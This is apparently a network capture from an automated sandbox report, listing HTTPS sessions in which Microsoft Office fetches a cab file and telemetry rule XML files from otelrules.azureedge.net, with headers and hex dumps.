                                                                                                                                                                        MS-CV: DH9j4oyHTUu2mNow.0
                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:33 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                        2024-11-24 04:11:34 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                        2024-11-24 04:11:34 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        34192.168.2.74973813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:34 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                        x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041135Z-178bfbc474bxkclvhC1NYC69g400000005f00000000026w4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:35 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        35192.168.2.74974013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:34 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                        x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041135Z-174c587ffdfb5q56hC1TEB04kg00000003sg00000000kb6w
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        36192.168.2.74974113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:34 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                        x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041135Z-174c587ffdftjz9shC1TEBsh9800000003r000000000gkuh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        37192.168.2.74973913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:34 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                        x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041135Z-15b8b599d88s6mj9hC1TEBur3000000003pg00000000eqg9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        38192.168.2.74974213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:35 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                        x-ms-request-id: 375df28d-601e-00ab-5b0b-3d66f4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041135Z-178bfbc474bpscmfhC1NYCfc2c000000042g000000004sq7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:35 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        39192.168.2.74974813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:37 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                        x-ms-request-id: 917a58a9-c01e-0066-7448-3da1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041137Z-15b8b599d88f9wfchC1TEBm2kc00000003y000000000kg3p
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:37 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        40192.168.2.74974913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:37 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                        x-ms-request-id: 242b2616-d01e-0017-014e-3cb035000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041137Z-15b8b599d88f9wfchC1TEBm2kc00000003z000000000ff2g
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:37 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        41192.168.2.74974713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:37 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                        x-ms-request-id: e805473a-a01e-0084-650a-3e9ccd000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041137Z-178bfbc474bpscmfhC1NYCfc2c000000041000000000a9uz
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        42192.168.2.74974613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:37 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                        x-ms-request-id: 2160d4c7-701e-0021-5913-3d3d45000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041137Z-178bfbc474bbcwv4hC1NYCypys000000057000000000exh5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
